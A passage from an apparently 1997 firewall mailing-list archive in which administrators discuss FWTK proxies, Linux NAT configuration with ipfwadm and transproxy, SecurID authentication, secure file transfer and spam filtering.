vulnerability by implementing a screened subnet. .------------. .------------. Internet | | | | ----------| Gateway |--+----| Firewall |-----+----------+-- . . . .----+ | | | | (Linux) | | | | '------------' | '------------' | | | | | | | .-------. .---------. .--------. .---------. | | | | | | | | | Mail | | File | | User | | User | | Host | | Server | | PC | | PC | | | | | | | | | '-------' '---------' '--------' '---------' I left out your router as it's irrelevant to the discussion. If you put a couple of network cards in the firewall host it can double as a router too. I'm doing just that at the moment, we're running a gateway system with a dynamic packet filter (a MorningStar SecureConnect) and a Linux box acts as a router and static packet filter. We also run the TIS firewall toolkit on the Linux box to allow limited inbound access, though I prefer SSH for that purpose. Ge' From owner-firewalls-outgoing Tue Jun 3 08:00:25 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA26623 for firewalls-outgoing; Tue, 3 Jun 1997 07:24:30 -0700 (PDT) Received: from brimstone.rnb.com (brimstone.rnb.com [204.178.80.14]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA26561 for ; Tue, 3 Jun 1997 07:24:05 -0700 (PDT) Received: by brimstone.rnb.com; id KAA13523; Tue, 3 Jun 1997 10:27:36 -0400 Received: from relay.rnb.com(199.99.101.2) by brimstone.rnb.com via smap (3.2) id xma013390; Tue, 3 Jun 97 10:27:16 -0400 Received: from monarch.rnb.com (monarch [150.1.29.115]) by relay.rnb.com (8.8.5/8.8.5) with SMTP id KAA10251; Tue, 3 Jun 1997 10:27:15 -0400 (EDT) Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Comments: Internet Message: Sender identity is not verified. Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Message-ID: X-Mailer: XFMail 1.2-alpha [p0] on Solaris Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <199706021753.KAA29975@cactus.tc.pw.com> Date: Tue, 03 Jun 1997 10:23:06 -0400 (EDT) Organization: Republic National Bank From: Ken Kempster To: Char_Sample@notes.pw.com, fwtk , firewalls Subject: Plug-gw- One to many relationship more specific info Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 02-Jun-97 Char_Sample@notes.pw.com wrote: >I've generally had good luck doing it w/ Gauntlet. There really is no >difference. >Do you have the plug going one way or both ways? This is what i'm tring to do: I current have a full blown gauntlet 3.2 running on Solaris. the feature that I need which Gauntlet does not support is service port pools. IE: I want to be able to configure a proxy to lissen to mult. service ports or pass traffic at the NAT level on a group of source and destination service ports. Gauntlet has IPFS but this is a one to all, all to one, one to one, or all to all relationship when it comes to service ports. You can not configure IPFS for a group of ports. Yes, IPFILTER does support this but I can't install in on top of the full blown Gauntlet. So, What I was thinking of doing was using FWTK with IPFILTER. But then you run into the problem of being able to configure a plug-gw that will pass from a single IP to multiple IPs. Plug-gw has to be able to rec. when IPFILTER passes a request to it, the plug needs to pull it's destination from that request; like Gauntlet's plug. I am using this box to firewall market data services and it's very difficult to accomodate all their requirements on one box. So, this is my problem. If anyone has other suggestions I can try, please let me know. thanx for any help. > >char >To: fwtk-users @ tis.com @ Internet, firewalls @ greatcircle.com @ Internet >cc: >From: kempster @ monarch.rnb.com @ Internet >Date: 06/02/97 10:31:54 AM >Subject: Plug-gw- One to many relationship > >Hi all, > > Has anyone gotten a one to many relationship to work >with FWTK 2.0? > > I want to be able to specify x.x.x.x plug-to * > or > x.x.x.x plug-to x.x.x.x x.x.x.x etc. > > >thanx for any help. > > > > > >|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| >| Ken Kempster kempster@monarch.rnb.com | >| Network Systems Engineer _\|/_ | >| Republic National Bank (o o) | >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~ > > >/* >******************************************************************************* >************* >*/ >/* char sample; that really is my name */ >/* phone: (410)412-8161 */ >/* e-mail: char_sample@notes.pw.com */ >/* >******************************************************************************* >************* >*/ |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | Ken Kempster kempster@monarch.rnb.com | | Network Systems Engineer _\|/_ | | Republic National Bank (o o) | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~ From owner-firewalls-outgoing Tue Jun 3 09:55:06 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA14142 for firewalls-outgoing; Tue, 3 Jun 1997 09:43:14 -0700 (PDT) Received: from nebula.is.rpslmc.edu (nebula.is.rpslmc.edu [144.74.19.111]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA14120 for ; Tue, 3 Jun 1997 09:43:08 -0700 (PDT) Received: (qmail 4721 invoked by uid 2001); 3 Jun 1997 16:51:03 -0000 Date: Tue, 3 Jun 1997 11:51:02 -0500 (CDT) From: "Daniel G. Drumm" To: "Kohn, Joav" cc: "'firewalls@greatcircle.com'" Subject: Re: SecureID, CryptoCard, etc... In-Reply-To: <0C673F68C3A0D011A94208002BE52625351C@USBGREXCH01> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 30 May 1997, Kohn, Joav wrote: > sorry for the off-topic post, but: > > anybody using keycard authentication to authenticate users in a > winNT/win95 environment? > > my CEO has gone security crazy and would like to implement keycard > authentication across the entire organization. so far, the vendors > haven't been much help with advise on how to get win95 to authenticate > with the cards. any information would be greatly appreciated. > > tia, > -joav kohn > sr. technical consultant > it/workgroup communications > landis & staefa > > (p.s.. this is for LAN/WAN access, not dial-in) Why would the environment have much to do with it? FW1 or TIS Gauntlet come with support for Secure/ID, you can have your employees get these cards, and authenticate against the Firewall. You can then set a user-by-user policy as to what they are allowed access to, and how long they can access it for. -- Daniel G. Drumm - ddrumm@rush.edu Rush Presbyterian St. Luke's Medical Center - Chicago, IL Network Division - Information Services From owner-firewalls-outgoing Tue Jun 3 10:00:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA15237 for firewalls-outgoing; Tue, 3 Jun 1997 09:53:40 -0700 (PDT) Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.200.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA15221 for ; Tue, 3 Jun 1997 09:53:34 -0700 (PDT) Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id JAA06233; Tue, 3 Jun 1997 09:57:09 -0700 (PDT) Date: Tue, 3 Jun 1997 09:57:08 -0700 (PDT) From: "Sameer R. Manek" To: Warpy cc: firewalls@GreatCircle.COM Subject: Re: SSH Equiv for FTP? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Jun 1997, Warpy wrote: > I was wondering whether there was an equivalent to SSH for ftp. Does > anyone know if there is? > > Warpy > The ssh "package" is supposed to be a replacement for the rsh suite. So ssh comes with ssh, slogin, scp. So scp is the default file copy method, though you can proxy a port via ssh, so if you wanted to in theory you can proxy ftp via ssh. I've never tried it out, so i'm not sure how difficult it is, or practical. I find scp is a lot easier to use. -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Sameer Manek manek@challenger.atc.fhda.edu The last four line .signature file on the entire internet -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From owner-firewalls-outgoing Tue Jun 3 10:46:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20475 for firewalls-outgoing; Tue, 3 Jun 1997 10:43:14 -0700 (PDT) Received: from mail.diginsite.com (mail.diginsite.com [208.2.189.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA20436 for ; Tue, 3 Jun 1997 10:43:00 -0700 (PDT) Received: from march.diginsite.com (march.diginsite.com [208.2.189.102]) by mail.diginsite.com (8.8.5/8.8.3) with ESMTP id KAA06986 for ; Tue, 3 Jun 1997 10:44:49 -0700 Message-Id: <199706031744.KAA06986@mail.diginsite.com> From: "David Lang" To: Subject: NAT on linux firewall? Date: Tue, 3 Jun 1997 09:45:44 -0700 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have had several requests for the summery of NAT on Linux so I am posting this to the list. Many thanks to Greg Haverkamp who was able to figure this out in the first place and let me know. David Lang What I found that you can do if you have a finite list of connections you are trying to make (I am connecting many web sites that are inside to the outside) is as follows. Using Linux kernel version 2.0.30 with FWTK 2 real ip address of f/w 200.200.200.1 addresses the web sites should appear as 200.200.200.2 to 200.200.200.200 real ip addresses of web sites 100.100.100.2 to 100.100.100.200 for 199 web sites. for each web site do the following: setup the alias ifconfig eth0:2 200.200.200.2 setup an input firewall filter (I created a file rc.fw that I run after rc.inet1) ipfwadm -I -a accept -r 10002 -S 0/0 -D 200.200.200.2 80 ipfwadm -I -a accept -r 11002 -S 0/0 -D 200.200.200.2 443 start up two copies of the plug-gw (from the TIS Firewall Toolkit) /usr/local/etc/plug-gw -daemon 10002 plug-gw /usr/local/etc/plug-gw -daemon 11002 plug-gw The folowing two rules should appear ing the /usr/local/etc/netperm-table plug-gw:port 10002 * -plug-to 100.100.100.2 -port 80 plug-gw:port 11002 * -plug-to 100.100.100.2 -port 443 what this does.... the ifconfig sets the alias so the firewall will listen to the port. the input filters accept a incoming packet from anywhere addressed to 200.200.200.2 on port 80 and change it to arrive at port 10002. the plug-gw then listenes at port 10002 and plugs anything it hears to 100.100.100.2 port 80 (standard http port). the other set does the same for the https ssl connection. to do this you need to have experimental options turned on, normal firewall and forwarding options turned on, and the EXPERIMENTAL IP_TRANSPARENT_PROXY must be turned on for the -r option to work in ipfwadm. This is a very ugly way to do this but it does work. let me know if you have any other questions. David Lang From owner-firewalls-outgoing Tue Jun 3 11:00:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20799 for firewalls-outgoing; Tue, 3 Jun 1997 10:45:45 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA20727 for ; Tue, 3 Jun 1997 10:45:24 -0700 (PDT) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id MAA09659; Tue, 3 Jun 1997 12:43:22 -0500 Received: from dns1srv.bridge.com(167.76.36.6) by gatekeeper.Bridge.COM via smap (V1.3) id sma009639; Tue Jun 3 12:43:13 1997 Received: from binki.bridge.com (binki.bridge.com [167.76.24.243]) by dns1srv.bridge.com (8.7.6/8.7.3) with ESMTP id MAA25390; Tue, 3 Jun 1997 12:47:37 -0500 (CDT) Received: (from ken@localhost) by binki.bridge.com (8.7/8.7) id MAA05711; Tue, 3 Jun 1997 12:48:08 -0500 (CDT) Date: Tue, 3 Jun 1997 12:48:08 -0500 (CDT) From: Ken Hardy Message-Id: <199706031748.MAA05711@binki.bridge.com> To: warpy@null.net Subject: Re: SSH Equiv for FTP? Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Jun 1997, Warpy wrote: > I was wondering whether there was an equivalent to SSH for ftp. Does > anyone know if there is? > > Warpy > The SSLeay package has an implementation of SSL-enabled ftp & ftpd, both of which can also interoperate with vanilla counterparts. http://www.psy.uq.oz.au/~ftp/Crypto From owner-firewalls-outgoing Tue Jun 3 11:15:48 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA23425 for firewalls-outgoing; Tue, 3 Jun 1997 11:04:52 -0700 (PDT) Received: from stargate.concorde.com (concorde.com [206.137.224.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA23408 for ; Tue, 3 Jun 1997 11:04:45 -0700 (PDT) Received: (from smap@localhost) by stargate.concorde.com (8.6.8.1/8.6.6) id OAA09131; Tue, 3 Jun 1997 14:05:55 -0400 Received: from bheema(198.242.54.246) by stargate via smap (V2.0) id xma009116; Tue, 3 Jun 97 14:05:31 -0400 Received: from bheema (bheema [198.242.54.246]) by bheema.concorde.com (8.7.5/8.7.3) with SMTP id OAA01750; Tue, 3 Jun 1997 14:05:36 -0400 (EDT) Date: Tue, 3 Jun 1997 14:05:36 -0400 (EDT) From: Srinivas Yalavarthy X-Sender: srini@bheema To: fwtk-users@tis.com, firewalls@greatcircle.com Subject: Blocking unwanted junk mail using FWTK Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I would like to know if it's possible to block junk mail using "smap" in FWTK 2.0. If anybody done this before, I would appreciate if you can share it with me. Thanks - Srinivas From owner-firewalls-outgoing Tue Jun 3 12:00:29 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA28171 for firewalls-outgoing; Tue, 3 Jun 1997 11:49:18 -0700 (PDT) Received: from mercury.house.gov (mercury.house.gov [143.231.1.67]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA28138 for ; Tue, 3 Jun 1997 11:49:10 -0700 (PDT) Received: from msg07.house.gov (msg07.house.gov [143.231.207.204]) by mercury.house.gov with SMTP (8.7.1/8.7.1) id OAA22482 for ; Tue, 3 Jun 1997 14:59:15 -0400 (EDT) Received: by msg07.house.gov with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC702D.F0E9E1B0@msg07.house.gov>; Tue, 3 Jun 1997 14:53:47 -0400 Message-ID: From: "Forno, Richard" To: "'Kohn, Joav'" , "'Daniel G. Drumm'" Cc: "'firewalls@greatcircle.com'" Subject: RE: SecureID, CryptoCard, etc... Date: Tue, 3 Jun 1997 14:53:46 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk SecurID has a NT/95 workstation client for one-pass authentication. >---------- >From: Daniel G. Drumm[SMTP:dgd@nebula.is.rpslmc.edu] >Sent: Tuesday, June 3, 1997 12:51 PM >To: Kohn, Joav >Cc: 'firewalls@greatcircle.com' >Subject: Re: SecureID, CryptoCard, etc... > >On Fri, 30 May 1997, Kohn, Joav wrote: > >> sorry for the off-topic post, but: >> >> anybody using keycard authentication to authenticate users in a >> winNT/win95 environment? >> >> my CEO has gone security crazy and would like to implement keycard >> authentication across the entire organization. so far, the vendors >> haven't been much help with advise on how to get win95 to authenticate >> with the cards. any information would be greatly appreciated. >> >> tia, >> -joav kohn >> sr. technical consultant >> it/workgroup communications >> landis & staefa >> >> (p.s.. this is for LAN/WAN access, not dial-in) > >Why would the environment have much to do with it? FW1 or TIS Gauntlet >come with support for Secure/ID, you can have your employees get these >cards, and authenticate against the Firewall. You can then set a >user-by-user policy as to what they are allowed access to, and how long >they can access it for. > >-- >Daniel G. Drumm - ddrumm@rush.edu >Rush Presbyterian St. Luke's Medical Center - Chicago, IL >Network Division - Information Services > > From owner-firewalls-outgoing Tue Jun 3 12:45:25 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA03214 for firewalls-outgoing; Tue, 3 Jun 1997 12:32:24 -0700 (PDT) Received: from omsk.quadrix.com (omsk.quadrix.com [208.210.34.65]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA03196 for ; Tue, 3 Jun 1997 12:32:14 -0700 (PDT) Received: from jukyu.quadrix.com by omsk.quadrix.com (4.1/SMI-4.1) id AA17678; Tue, 3 Jun 97 15:35:18 EDT Date: Tue, 3 Jun 97 15:35:17 EDT Message-Id: <9706031935.AA17678@omsk.quadrix.com> From: Bill Van Emburg To: ss1011@bbtnet.com Subject: RE: Does Raptor WebNOT Block Legitimate Sites? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't think you meant to send this to the firewalls list, but I'll offer you some info anyway.... Date: Mon, 2 Jun 1997 15:19:12 -0400 From: Tim Thayer Allen, any movement on this issue? We are still getting complaints from users. The most recent was URL: www.emeregency.com Tim Thayer -------------------------------- >Date: Tue, 11 Mar 1997 08:21:10 -0500 (EST) >From: Allen Rogers >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? > > >This is a list that Raptor licenses directly from Microsystems. The actual >URLs used, and their abbreviated nature, is due to how Microsystems chooses >to create their list. I am trying to open a formal path where our customers >can present queries/requests to them directly for particular sites. I will >keep you posted. > The problem is, as was mentioned in the part of the message I deleted, that the URLs are truncated. All the filtering services have their problems, this is one of the bigger ones. Sometimes, sites also get blocked because they are critical of the filtering companies.... In any case, visit: http://cgi.pathfinder.com/@@qO5IngUAPMqarMCj/netly/spoofcentral/censored/ They will give you some more info, and also the ability to check whether a particular site is blocked by several of the most common filtering programs. -- -- Bill Van Emburg Phone: 908-235-2335 Quadrix Solutions, Inc. Fax: 908-235-2336 (bve@quadrix.com) Check out http://yourtown.com! (http://quadrix.com) "You do what you want, and if you didn't, you don't" From owner-firewalls-outgoing Tue Jun 3 14:03:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA08744 for firewalls-outgoing; Tue, 3 Jun 1997 13:31:09 -0700 (PDT) Received: from cih-gw.cih.com ([204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA08670 for ; Tue, 3 Jun 1997 13:30:51 -0700 (PDT) Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id QAA30042; Tue, 3 Jun 1997 16:35:40 -0400 X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd30040aaa; Tue Jun 3 20:35:36 1997 Date: Tue, 3 Jun 1997 16:35:36 -0400 (EDT) From: "Craig I. Hagan" Reply-To: hagan@cih.com To: Srinivas Yalavarthy cc: fwtk-users@tis.com, firewalls@GreatCircle.COM Subject: Re: Blocking unwanted junk mail using FWTK In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Hi, > > I would like to know if it's possible to block junk mail > using "smap" in FWTK 2.0. > > If anybody done this before, I would appreciate if you can share > it with me. check out http://www.cih.com/~hagan/smap-hacks does exactly what you are looking for (i think). -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Tue Jun 3 14:16:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA13102 for firewalls-outgoing; Tue, 3 Jun 1997 14:10:57 -0700 (PDT) Received: from libofmich.lib.mi.us (libofmich.lib.mi.us [198.109.128.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA13092 for ; Tue, 3 Jun 1997 14:10:51 -0700 (PDT) Received: by libofmich.lib.mi.us (AIX 3.2/UCB 5.64/4.03) id AA41995; Tue, 3 Jun 1997 17:16:44 -0400 Date: Tue, 3 Jun 1997 17:16:44 -0400 (EDT) From: "Amy (Cremer) Briggs" To: firewalls@greatcircle.com Subject: Solaris Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk First of all if there is a better list to post this to please let me know. I've checked out Suns web site and didn't find any mention of a Solaris listserv. Does anyone know how can you trick a Solaris box into treating a class C address as a class B. For example we want to use 2xx.xx.0.0 as a class B address. I've entered the class B subnetmask for this network in the /etc/netmasks file which is how I thought you could do it but it isn't working for me. It still thinks its a class C address and won't route properly if I set up my routes using it as a class B address. Finding a way to make this work would save me hours of time because I have 5 full class B(Technically class C) networks to do this for and entering all the class C's within all 5 class B's would take me awhile as well as complicate my routing table. Thanks for any help or information you can give me. Amy \\\\\\\\\\\\\\Amy Briggs Microcomputer Support Specialist/////////////// Library of Michigan amyc@libofmich.lib.mi.us \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////////////// ** Its not what you've got, its what you give--TESLA ** From owner-firewalls-outgoing Tue Jun 3 15:00:19 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA15802 for firewalls-outgoing; Tue, 3 Jun 1997 14:41:47 -0700 (PDT) Received: from snoopy.hypercon.com (mail2.concom.com [198.64.246.149]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA15770 for ; Tue, 3 Jun 1997 14:41:38 -0700 (PDT) Received: from pitbull.ep.hess.com ([207.51.255.129]) by snoopy.hypercon.com (post.office MTA v1.9.1 ID# 0-11151) with SMTP id AAA164 for ; Tue, 3 Jun 1997 16:48:09 -0500 Received: from hac31d.ep.hess.com ([15.43.4.161]) by pitbull.ep.hess.com via smtpd (for mail2.concom.com [198.64.246.149]) with SMTP; 3 Jun 1997 21:45:09 UT Message-ID: <3394907A.42F9@hypercon.com> Date: Tue, 03 Jun 1997 16:45:30 -0500 From: msquared Reply-To: msquared@hypercon.com X-Mailer: Mozilla 3.0 (Win95; U) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: RAPTOR WEBNOT SITE BLOCKING Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It was written: " >From: Allen Rogers >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? > > >This is a list that Raptor licenses directly from Microsystems. The actual >URLs used, and their abbreviated nature, is due to how Microsystems chooses >to create their list. I am trying to open a formal path where our customers >can present queries/requests to them directly for particular sites. I will >keep you posted." >CyberPatrol gives two forms at their site for 1) adding a site to the list of blocked sites - http://www.microsys.com/cybernot/form_add.htm or 2) removing a site from the list - http://www.microsys.com/cybernot/form_rev.htm. I've seen them take action in as little as two hours. They have always responded the next business day with a confirming mail note. Mike From owner-firewalls-outgoing Tue Jun 3 16:02:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA19417 for firewalls-outgoing; Tue, 3 Jun 1997 15:06:32 -0700 (PDT) Received: from ren.globecomm.net (ren.globecomm.net [207.51.48.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA19383 for ; Tue, 3 Jun 1997 15:06:22 -0700 (PDT) Received: from chiba (syd2-ppp-131.tpgi.com.au [203.29.157.131]) by ren.globecomm.net (8.8.5/8.8.0) with SMTP id SAA19560 for ; Tue, 3 Jun 1997 18:09:53 -0400 (EDT) Date: Tue, 3 Jun 1997 08:10:31 +1000 (EST) From: Warpy To: firewalls@GreatCircle.COM Subject: Secure Pop3? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Following on in the same thread of my last question, I have seen that one of the best sources of clear text logins and passwords to be from people accessing pop3 (while a sniffer is running, in this case "linsniff"). Is there a secure pop3 "getmail" program available, or a way i can implement existing secure transfer programs (such as ssh) with *nix based pop3 mail grabber programs? Warpy From owner-firewalls-outgoing Tue Jun 3 16:41:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA00115 for firewalls-outgoing; Tue, 3 Jun 1997 16:13:33 -0700 (PDT) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA00104 for ; Tue, 3 Jun 1997 16:13:26 -0700 (PDT) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wZ2os-0004J0C (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:16:50 +0200 (MET DST) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Wed, 4 Jun 97 01:16 MET DST Received: by lina.inka.de id m0wZ2kO-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:12:12 +0200 (CEST) Message-Id: Date: Wed, 4 Jun 1997 01:12:10 +0200 From: Bernd Eckenfels To: David Lang Cc: firewalls@greatcircle.com Subject: Re: NAT on linux firewall? References: <199706031744.KAA06986@mail.diginsite.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67 In-Reply-To: <199706031744.KAA06986@mail.diginsite.com>; from David Lang on Tue, Jun 03, 1997 at 09:45:44AM -0700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, On Jun 3, David Lang wrote > for each web site do the following: > setup the alias > > ifconfig eth0:2 200.200.200.2 You don't need that Aliasdevice, it's enough (much better) to use Proxy Arp with the following single command: arp -s 200.200.200.0 xx:xx:xx:xx:xx netmask 255.255.255.0 pub (with xx:xx:xx:xx:xx:xx beeing the ethernet address of your network card). > setup an input firewall filter (I created a file rc.fw that I run after > rc.inet1) instead you can use a modified transproxy or netcat.. humm.. will look into this. I think with iproute and 2.1 kernels you can do the same thing: iproute addrule to 200.200.200 nat 100.100.100 Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From owner-firewalls-outgoing Tue Jun 3 17:11:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA06126 for firewalls-outgoing; Tue, 3 Jun 1997 16:57:59 -0700 (PDT) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA05349 for ; Tue, 3 Jun 1997 16:50:36 -0700 (PDT) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wZ3On-0004J0C (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:53:57 +0200 (MET DST) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Wed, 4 Jun 97 01:53 MET DST Received: by lina.inka.de id m0wZ3Jq-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:48:50 +0200 (CEST) Message-Id: Date: Wed, 4 Jun 1997 01:48:48 +0200 From: Bernd Eckenfels To: David Lang , firewalls@greatcircle.com Cc: Bernd Eckenfels Subject: Re: NAT on linux firewall? References: <199706032327.QAA07588@mail.diginsite.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67 In-Reply-To: <199706032327.QAA07588@mail.diginsite.com>; from David Lang on Tue, Jun 03, 1997 at 03:28:13PM -0700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > where can I get info on iproute? is that something new in the 2.1 kernels? Yes, 2.1.x (x>15) ships with linux/Documentation/networking/ policy-routing.txt and routing.txt. which describes the new features briefly. iproute can be obtained from any Debian GNU/Linux Mirror (ftp.debian.org:/debian/bo/source/net) as iproute_961225-2.tar.gz. (Transproxy is there, too in transproxy_0.2.orig.tar.gz) I found another Solution which does not need ipfwadm und plug-gw, but using transproxy instead: arp -s 200.200.200.0 xx:xx:xx:xx:xx:xx netmask 255.255.255.0 pub route add -net 200.200.200.0 netmask 255.255.255.0 dev lo tproxyd -t -b 200.200.200.2 -s 80 -r nobody 100.100.100.2 80 ... tproxyd -t -b 200.200.200.254 -s 80 -r nobody 100.100.100.254 80 BTW: you dont need to use 200 different IP Addresses for the WWW-Servers. You can run multiple WWW-Servers on different Ports: tproxyd -t -b 200.200.200.2 -s 80 -r nobody 100.100.100.2 80 ... tproxyd -t -b 200.200.200.254 -s 80 -r nobody 100.100.100.2 334 Greetings Bernd PS: with a patch to transproxy simple translation tables will allow you to run only one tproxyd server instance. -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From owner-firewalls-outgoing Tue Jun 3 17:41:14 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA09189 for firewalls-outgoing; Tue, 3 Jun 1997 17:18:00 -0700 (PDT) Received: from access2.digex.net (access2.digex.net [205.197.245.193]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA09168 for ; Tue, 3 Jun 1997 17:17:49 -0700 (PDT) Received: from localhost (brads@localhost) by access2.digex.net (8.8.4/8.8.4) with SMTP id UAA26995; Tue, 3 Jun 1997 20:21:27 -0400 (EDT) Date: Tue, 3 Jun 1997 20:21:26 -0400 (EDT) From: Bradley Smith To: Warpy cc: firewalls@GreatCircle.COM Subject: Re: 